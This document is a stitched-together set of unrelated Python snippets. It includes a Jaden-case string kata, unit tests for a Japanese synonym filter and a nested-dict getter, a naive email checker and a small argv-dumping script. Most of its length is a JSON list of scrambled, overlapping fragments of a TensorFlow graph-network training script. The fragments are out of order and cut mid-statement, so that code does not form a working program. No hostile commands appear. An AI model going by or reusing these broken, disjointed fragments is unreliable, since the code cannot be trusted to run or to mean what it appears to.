Jaden-Cased: "How Can Mirrors Be Real If Our Eyes Aren't Real"
"""
import string


def to_jaden_case(string: str) -> str:
    """ My implementation """
    return ' '.join([word.capitalize() for word in string.split()])


def to_jaden_case2(string_input: str) -> str:
    """ Another person's version. string.capwords() is handy. """
    return string.capwords(string_input)


print(to_jaden_case("How can mirrors be real if our eyes aren't real"))
print(to_jaden_case2("How can mirrors be real if our eyes aren't real"))
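A note on the two implementations above: str.title() would not be a drop-in third variant, because it capitalizes the letter after an apostrophe, while capitalize() and string.capwords() leave it alone. A quick check (plain Python, not part of the kata):

import string

s = "how can mirrors be real if our eyes aren't real"
print(" ".join(w.capitalize() for w in s.split()))  # ... Aren't Real
print(string.capwords(s))                           # same result
print(s.title())                                    # ... Aren'T Real  <- apostrophe pitfall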
from chinormfilter import __version__
from chinormfilter.cli import Filter


def test_version():
    assert __version__ == '0.5.0'


def test_kuro2sudachi_cli(capsys):
    f = Filter(dict_type="full")
    assert f.duplicated("林檎,りんご") is True
    assert f.duplicated("レナリドミド, レナリドマイド") is False
    assert f.duplicated("エダマメ,枝豆") is True
    assert f.duplicated("えだまめ,枝豆") is True
    assert f.duplicated("飲む,呑む") is True
    assert f.duplicated("エダマメ => 枝豆") is True
    assert f.duplicated("tlc => tlc,全肺気量") is False
    assert f.duplicated("リンたんぱく質,リン蛋白質,リンタンパク質") is True
    assert f.duplicated("グルタチオン => グルタチオン,タチオン,ランデールチオン") is False
<filename>test/test_getter.py
from funcy_chain import getter


def test_long_path(Chain):
    data = [{"a": {"b": {"c": [1, 2, {"d": [3, {1: 2}]}]}}}]
    assert Chain(data).map(getter(["a", "b", "c", 2, "d", 1, 1])).value == [2]


def test_names(Chain):
    data = {
        "user1": {
            "firstname": "Alice",
            "lastname": "Liddle",
        },
        "user2": {
            "firstname": "Bob",
            "lastname": "Kennedy",
        },
    }
    names = (
        Chain(data).items().map(getter([1, "lastname"], [1, "firstname"])).sort().map(", ".join)
    ).value
    assert names == ["<NAME>", "<NAME>"]
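These tests pin down getter's observable behaviour: a single path list drills into nested dicts/lists key by key, and several path lists produce one tuple per item (which test_names then joins). A rough sketch consistent with the tests, not funcy_chain's actual implementation:

from functools import reduce

def getter_sketch(*paths):
    """One path -> the extracted value; several paths -> a tuple of values."""
    def extract(obj, path):
        return reduce(lambda acc, key: acc[key], path, obj)
    if len(paths) == 1:
        return lambda obj: extract(obj, paths[0])
    return lambda obj: tuple(extract(obj, p) for p in paths)

data = {"a": {"b": [10, 20]}}
assert getter_sketch(["a", "b", 1])(data) == 20
assert getter_sketch(["a", "b", 0], ["a", "b", 1])(data) == (10, 20)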
# Email address validation in Python
contador = 0
email = input("Enter your email address: ")
for i in email:
    # the original tested `if ("@" or ".")`, which is always truthy and so
    # counted every character; count the actual separator characters instead
    if i == "@" or i == ".":
        contador = contador + 1
if contador == 2:
    print("Valid email")
else:
    print("Invalid email")
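Even with the counting bug fixed, this check stays naive: it happily accepts "a@b@" (two separators, no dot). If the exercise were extended, a small regex states the intent directly; a sketch, deliberately far short of a full RFC 5322 validator:

import re

# one non-empty local part, one "@", at least one dot in the domain
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

def is_valid_email(address: str) -> bool:
    return EMAIL_RE.match(address) is not None

print(is_valid_email("alice@example.com"))  # True
print(is_valid_email("a@b@"))               # False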
#!/usr/bin/env python3
import json
import os
import sys

NAME = "{VERSION_FROM}-{VERSION_CURRENT}-{VERSION_TO}-{STAGE}.json"

with open(NAME.format(**os.environ), "w") as fd:
    json.dump(sys.argv, fd)
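For context, the script above names its output file purely from four environment variables. A hypothetical invocation (the filename dump_args.py is made up for the example):

import os
import subprocess

env = dict(os.environ,
           VERSION_FROM="1.0", VERSION_CURRENT="1.1",
           VERSION_TO="1.2", STAGE="pre")
subprocess.run(["python3", "dump_args.py", "alpha", "beta"], env=env, check=True)
# writes ["dump_args.py", "alpha", "beta"] to 1.0-1.1-1.2-pre.json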
[
"# Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation",
"[mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features, y_train, y_val, y_test, train_mask,",
"evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and",
"print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time() - train_starttime # Tacc =",
"FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func",
"# 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method",
"Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 # millisecond freq = 600",
"for j in range(0, 3): temp2 = temp1 + [mo[j]] for k in",
"sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features,",
"Code_models import GCN, MLP, MORE #--------------------------- main process ---------------------------# # Set random seed",
"range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14,",
"FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not",
"in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a')",
"sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc = [], [], [] train_loss, val_loss,",
"'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of",
"of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay',",
"'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in",
"as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i))",
"mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures,",
"mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss:",
"support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op,",
"model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session() # Define model evaluation",
"dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) #",
"'dense': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MLP",
"variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc = [], [], [] train_loss,",
"FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func",
"'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).')",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500",
"mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]]",
"Code_utils import * from Code_models import GCN, MLP, MORE #--------------------------- main process ---------------------------#",
"= MORE else: raise ValueError('Invalid argument for model: ' + str(FLAGS.model)) # Define",
"i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\",",
"seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS =",
"\"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration",
"dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training",
"MORE #--------------------------- main process ---------------------------# # Set random seed seed = 123 np.random.seed(seed)",
"training #-------------------------- import package --------------------------# from __future__ import division from __future__ import print_function",
"of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\",",
"Training step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost,",
"placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch + 1),",
"cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\",",
"open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in",
"Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i))",
"= [0.01, 0.001, 0.0003, 0.003] le = [300, 500, 1000, 2000] mo =",
"- keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping',",
"= 1 model_func = GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree)",
"[], [], [] train_loss, val_loss, Tloss = [], [], [] # Train model",
"print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]]",
"preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support =",
"'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()),",
"Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support",
"preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports =",
"= epoch + 1 # Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train,",
"2, 20):] # Testing test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features, support,",
"time.time() train_time_list = [] stop_epoch = 0 for epoch in range(FLAGS.epochs): t =",
"\"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features, support, y_test,",
"'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create",
"\"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost,",
"in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the",
"+ 1 # Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures,",
"# Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') #",
"embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the",
"[la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate =",
"GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not used num_supports =",
"y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features =",
"'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout",
"== 'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func = GCN elif FLAGS.model",
"= chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func = GCN elif FLAGS.model",
"Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session()",
"+ FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] #",
"# Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']:",
"tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable",
"= time.time() stop_epoch = epoch + 1 # Construct feed dictionary feed_dict =",
"FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time()",
"open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in",
"+ 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() -",
"of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden',",
"Not used num_supports = 1 model_func = MLP elif FLAGS.model == 'MORE': support",
"= evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping",
"y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features)",
"from Code_models import GCN, MLP, MORE #--------------------------- main process ---------------------------# # Set random",
"val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\",",
"preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func =",
"open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch,",
"False if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le",
"function def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val =",
"property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [],",
"break print(\"Optimization Finished!\") train_time = time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping *",
"= [], [], [] # Train model train_starttime = time.time() train_time_list = []",
"tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model',",
"FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func = GCN elif",
"evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support,",
"'the method of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run",
"number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method',",
"val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as",
"256, 512] mode_list = [] for i in range(0, 4): temp1 = [lr[i],",
"Testing test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures,",
"epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4,",
"model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features, support,",
"used num_supports = 1 model_func = MORE else: raise ValueError('Invalid argument for model:",
"% (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\",",
"placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)),",
"= [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MORE else: raise",
"tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.')",
"= load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model",
"f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time))",
"tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model",
"\"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime #",
"(time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc",
"features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing",
"variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model = model_func(placeholders,",
"= [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features, y_train, y_val, y_test,",
"= model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session() # Define model",
"i in range(0, 4): temp1 = [lr[i], le[i]] for j in range(0, 3):",
"train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime = time.time()",
"if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le =",
"t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures,",
"number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') # embeding_combination_method ----",
"tf import winsound from Code_utils import * from Code_models import GCN, MLP, MORE",
"2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128, 256, 512]",
"for i in range(0, 4): temp1 = [lr[i], le[i]] for j in range(0,",
"import GCN, MLP, MORE #--------------------------- main process ---------------------------# # Set random seed seed",
"mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs",
"* 2, 20):] # Testing test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features,",
"of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') # embeding_combination_method ---- \"Hadamard\",",
"+ str(FLAGS.model)) # Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in",
"Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime = time.time() test_cost, test_acc,",
"step outs = sess.run([model.opt_op, model.loss, model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc,",
"support = [preprocess_adj(adj)] num_supports = 1 model_func = GCN elif FLAGS.model == 'gcn_cheby':",
"range(0, 3): temp2 = temp1 + [mo[j]] for k in range(0, 5): temp3",
"'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn',",
"Load data adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset)",
"motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the",
"if FLAGS.model == 'gcn': support = [preprocess_adj(adj)] num_supports = 1 model_func = GCN",
"1 model_func = MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not",
"tensorflow as tf import winsound from Code_utils import * from Code_models import GCN,",
"support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MORE else:",
"= temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59",
"stopping...\") break print(\"Optimization Finished!\") train_time = time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping",
"# Testing test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask,",
"= [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MLP elif FLAGS.model",
"test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\",",
"GCN, MLP, MORE #--------------------------- main process ---------------------------# # Set random seed seed =",
"Data: 2020-01-10 # Function: Run training #-------------------------- import package --------------------------# from __future__ import",
"for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (#",
"# Validation cost, acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost)",
"support, labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels,",
"* from Code_models import GCN, MLP, MORE #--------------------------- main process ---------------------------# # Set",
"feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val =",
"'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs",
"1 model_func = MORE else: raise ValueError('Invalid argument for model: ' + str(FLAGS.model))",
"features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the",
"evaluation function def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val",
"feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) #",
"import time import tensorflow as tf import winsound from Code_utils import * from",
"motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early",
"flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout',",
"FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le = [300, 500,",
"le = [300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la =",
"ValueError('Invalid argument for model: ' + str(FLAGS.model)) # Define placeholders placeholders = {",
"\"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc,",
"division from __future__ import print_function import time import tensorflow as tf import winsound",
"1 # Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders)",
"test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures)",
"0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5,",
"= mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden =",
"helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model =",
"= tf.Session() # Define model evaluation function def evaluate(features, support, labels, mask, motiffeatures,",
"'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination')",
"FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense':",
"session sess = tf.Session() # Define model evaluation function def evaluate(features, support, labels,",
"layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') # embeding_combination_method",
"= [32, 64, 128, 256, 512] mode_list = [] for i in range(0,",
"range(0, 4): temp1 = [lr[i], le[i]] for j in range(0, 3): temp2 =",
"feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step",
"time import tensorflow as tf import winsound from Code_utils import * from Code_models",
"time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set",
"train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for",
"features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn': support = [preprocess_adj(adj)]",
"f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for",
"# Sound duration = 500 # millisecond freq = 600 # Hz winsound.Beep(freq,",
"temp1 = [lr[i], le[i]] for j in range(0, 3): temp2 = temp1 +",
"hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') #",
"learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate",
"FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE',",
"= [] train_acc, val_acc, Tacc = [], [], [] train_loss, val_loss, Tloss =",
"model_func = GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not used",
"construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0],",
"[preprocess_adj(adj)] # Not used num_supports = 1 model_func = MLP elif FLAGS.model ==",
"[mode[3]] # Load data adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures",
"16, 'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial",
"cost_val = [] train_acc, val_acc, Tacc = [], [], [] train_loss, val_loss, Tloss",
"with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i",
"train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc:",
"flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for",
"test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if",
"motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch +",
"4): temp1 = [lr[i], le[i]] for j in range(0, 3): temp2 = temp1",
"max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss:",
"input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session() # Define model evaluation function",
"'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout",
"evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\",",
"for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels':",
"str(FLAGS.model)) # Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)],",
